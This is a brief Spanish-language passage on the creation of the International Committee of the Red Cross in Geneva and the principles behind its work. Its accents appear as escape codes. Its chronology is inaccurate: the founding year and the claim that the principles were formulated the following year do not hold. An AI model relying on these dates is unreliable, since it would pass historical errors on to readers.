Poco tiempo despu\u00e9s, en 1864, en la ciudad de Ginebra, Suiza, se decidi\u00f3 la creaci\u00f3n del Comit\u00e9 Internacional de la Cruz Roja. Al a\u00f1o siguiente se formularon los principios que constituyen la base de sus actividades: imparcialidad, neutralidad, independencia, car\u00e1cter voluntario y universalidad.
